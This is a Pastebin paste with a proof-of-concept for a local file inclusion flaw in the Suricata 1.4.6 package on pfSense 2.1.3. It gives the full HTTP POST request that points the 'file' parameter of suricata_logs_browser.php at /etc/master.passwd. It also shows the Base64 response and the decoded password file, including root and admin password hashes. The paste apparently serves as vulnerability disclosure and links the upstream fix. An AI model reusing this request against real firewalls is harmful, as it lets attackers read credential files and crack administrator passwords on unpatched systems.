API tools faq
paste
vietjovi

LFI vulnerability in Suricata 1.4.6 on Pfsense 2.1.3

vietjovi
Jun 27th, 2019 (edited)
2,796
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.38 KB | None | 0 0
raw download clone embed print report
  1. # Exploit Title: LFI(Local File Inclusion) vulnerability in Suricata 1.4.6 on Pfsense 2.1.3
  2. # Date: 2014-05-21
  3. # Software Link: https://www.pfsense.org/
  4. # Version: 2.1.3
  5. # Vendor: Pfsense
  6. # Exploit Author: Vu Van Hieu - hieuvnuhcm@gmail.com/hieuvu@uns.vn, Nguyen Quoc Viet - vietnguyen@uns.vn/vietjovi@gmail.com
  7. # CVE: CVE-2020-19678
  8. # Category: IDS
  9. # Tested on: Firefox
  10.  
  11. # Description
  12. # There is a LFI(Local File Inclusion) vulnerability in Suricata 1.4.6 pkg v1.0.1 on Pfsense 2.1.3
  13. # It allows attacker to include files on a server through the web browser, and read any files on server.
  14. # The vulnerability allows remote attackers to retrieve arbitrary files via the file parameter to /suricata/suricata_logs_browser.php
  15.  
  16. # POC
  17. This is an POST HEADER when you access to https://Your_Pfsense_Server/suricata/suricata_logs_browser.php. You can modified "file" parameter to read any file(Example: /etc/master.passwd):
  18. + HTTP POST header:
  19. ```
  20. Host: Your_Pfsense_Server
  21. User-Agent: Mozilla/5.0
  22. Accept: */*
  23. Accept-Language: en-us,en;q=0.5
  24. Accept-Encoding: gzip, deflate
  25. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  26. X-Requested-With: XMLHttpRequest
  27. Referer: https://Your_Pfsense_Server/suricata/suricata_logs_browser.php
  28. Content-Length: 132 Cookie: cookie_test=1400576638; PHPSESSID=7d20151aeace555ee38d8d923f47c3aa
  29. Connection: keep-alive
  30. Pragma: no-cache
  31. Cache-Control: no-cache
  32.  
  33. __csrf_magic=sid:4c06775fcb95114389a0da397f509158d261ea54,1400573055&action=load&file=/etc/master.passwd
  34. ```
  35.  
  36. + The server will response Base64 Encoded data:
  37. ```
  38. |0|/etc/master.passwd|IyAkRnJlZUJTRDogc3JjL2V0Yy9tYXN0ZXIucGFzc3dkLHYgMS4zOSAyMDA0LzA4LzAxIDIxOjMzOjQ3IG1hcmttIEV4cCAkCiMKcm9vdDokMSRkU0pJbUZwaCRHdlo3LjFVYnVXdS5ZYjhldEMwcmUuOjA6MDo6MDowOkNoYXJsaWUgJjovcm9vdDovYmluL3NoCnRvb3I6KjowOjA6OjA6MDpCb3VybmUtYWdhaW4gU3VwZXJ1c2VyOi9yb290OgpkYWVtb246KjoxOjE6OjA6MDpPd25lciBvZiBtYW55IHN5c3RlbSBwcm9jZXNzZXM6L3Jvb3Q6L3Vzci9zYmluL25vbG9naW4Kb3BlcmF0b3I6KjoyOjU6OjA6MDpTeXN0ZW0gJjovOi91c3Ivc2Jpbi9ub2xvZ2luCmJpbjoqOjM6Nzo6MDowOkJpbmFyaWVzIENvbW1hbmRzIGFuZCBTb3VyY2U6LzovdXNyL3NiaW4vbm9sb2dpbgp0dHk6Kjo0OjY1NTMzOjowOjA6VHR5IFNhbmRib3g6LzovdXNyL3NiaW4vbm9sb2dpbgprbWVtOio6NTo2NTUzMzo6MDowOktNZW0gU2FuZGJveDovOi91c3Ivc2Jpbi9ub2xvZ2luCmdhbWVzOio6NzoxMzo6MDowOkdhbWVzIHBzZXVkby11c2VyOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbmV3czoqOjg6ODo6MDowOk5ld3MgU3Vic3lzdGVtOi86L3Vzci9zYmluL25vbG9naW4KbWFuOio6OTo5OjowOjA6TWlzdGVyIE1hbiBQYWdlczovdXNyL3NoYXJlL21hbjovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOio6MjI6MjI6OjA6MDpTZWN1cmUgU2hlbGwgRGFlbW9uOi92YXIvZW1wdHk6L3Vzci9zYmluL25vbG9naW4Kc21tc3A6KjoyNToyNTo6MDowOlNlbmRtYWlsIFN1Ym1pc3Npb24gVXNlcjovdmFyL3Nwb29sL2NsaWVudG1xdWV1ZTovdXNyL3NiaW4vbm9sb2dpbgptYWlsbnVsbDoqOjI2OjI2OjowOjA6U2VuZG1haWwgRGVmYXVsdCBVc2VyOi92YXIvc3Bvb2wvbXF1ZXVlOi91c3Ivc2Jpbi9ub2xvZ2luCmJpbmQ6Kjo1Mzo1Mzo6MDowOkJpbmQgU2FuZGJveDovOi91c3Ivc2Jpbi9ub2xvZ2luCnByb3h5Oio6NjI6NjI6OjA6MDpQYWNrZXQgRmlsdGVyIHBzZXVkby11c2VyOi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpfcGZsb2dkOio6NjQ6NjQ6OjA6MDpwZmxvZ2QgcHJpdnNlcCB1c2VyOi92YXIvZW1wdHk6L3Vzci9zYmluL25vbG9naW4Kd3d3Oio6ODA6ODA6OjA6MDpXb3JsZCBXaWRlIFdlYiBPd25lcjovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4Kbm9ib2R5Oio6NjU1MzQ6NjU1MzQ6OjA6MDpVbnByaXZpbGVnZWQgdXNlcjovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KZGhjcGQ6KjoxMDAyOjEwMDI6OjA6MDpESENQIERhZW1vbjovbm9uZXhpc3RlbnQ6L3NiaW4vbm9sb2dpbgpfZGhjcDoqOjY1OjY1OjowOjA6ZGhjcCBwcm9ncmFtczovdmFyL2VtcHR5Oi91c3Ivc2Jpbi9ub2xvZ2luCl9pc2FrbXBkOio6Njg6Njg6OjA6MDppc2FrbXBkIHByaXZzZXA6L3Zhci9lbXB0eTovc2Jpbi9ub2xvZ2luCnV1Y3A6Kjo2Njo2Njo6MDowOlVVQ1AgcHNldWRvLXVzZXI6L3Zhci9zcG9vbC91dWNwcHVibGljOi91c3IvbG9jYWwvbGliZXhlYy91dWNwL3V1Y2ljbwpwb3A6Kjo2ODo2OjowOjA6UG9zdCBPZmZpY2UgT3duZXI6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCl9udHA6KjoxMjM6MTIzOjowOjA6TlRQIGRhZW1vbjovdmFyL2VtcHR5Oi9zYmluL25vbG9naW4KX3JlbGF5ZDoqOjkxMzo5MTM6OjA6MDpSZWxheSBEYWVtb246L3Zhci9lbXB0eTovdXNyL3NiaW4vbm9sb2dpbgphZG1pbjokMSRkU0pJbUZwaCRHdlo3LjFVYnVXdS5ZYjhldEMwcmUuOjA6MDo6MDowOlN5c3RlbSBBZG1pbmlzdHJhdG9yOi9yb290Oi9ldGMvcmMuaW5pdGlhbAp0ZXN0OipMT0NLRUQqJDEkTWoxY0RpdDIkQUpoZVlBalV1ZXIwa2dUWHd6dXRzLzoyMDAwOjY1NTM0OjowOjA6Oi9ob21lL3Rlc3Q6L3NiaW4vbm9sb2dpbgo=|
  39. ```
  40.  
  41. + Decode the content in Base64:
  42. ```
  43. # $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
  44. #
  45. root:$1$dSJImFph$GvZ7.1UbuWu.
  46. Yb8etC0re.:0:0::0:0:Charlie &:/root:/bin/sh
  47. toor:*:0:0::0:0:Bourne-again Superuser:/root:
  48. daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
  49. operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
  50. bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
  51. tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
  52. kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
  53. games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
  54. news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
  55. man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
  56. sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
  57. smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
  58. mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
  59. bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
  60. proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
  61. _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
  62. www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
  63. nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
  64. dhcpd:*:1002:1002::0:0:DHCP Daemon:/nonexistent:/sbin/nologin
  65. _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
  66. _isakmpd:*:68:68::0:0:isakmpd privsep:/var/empty:/sbin/nologin
  67. uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
  68. pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
  69. _ntp:*:123:123::0:0:NTP daemon:/var/empty:/sbin/nologin
  70. _relayd:*:913:913::0:0:Relay Daemon:/var/empty:/usr/sbin/nologin
  71. admin:$1$dSJImFph$GvZ7.1UbuWu.Yb8etC0re.:0:0::0:0:System Administrator:/root:/etc/rc.initial
  72. test:*LOCKED*$1$Mj1cDit2$AJheYAjUuer0kgTXwzuts/:2000:65534::0:0::/home/test:/sbin/nologin
  73. ```
  74.  
  75. #REF
  76. https://github.com/pfsense/pfsense-packages/pull/659
  77. https://github.com/pfsense/pfsense-packages/commit/59ed3438729fd56452f58a0f79f0c288db982ac3
  78. http://www.2ngon.com/2015/01/lfi-vulnerability-suricata-146-pkg-v101.html
  79. https://2ng0n.blogspot.com/2015/01/lfi-vulnerability-suricata-146-pkg-v101.html
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!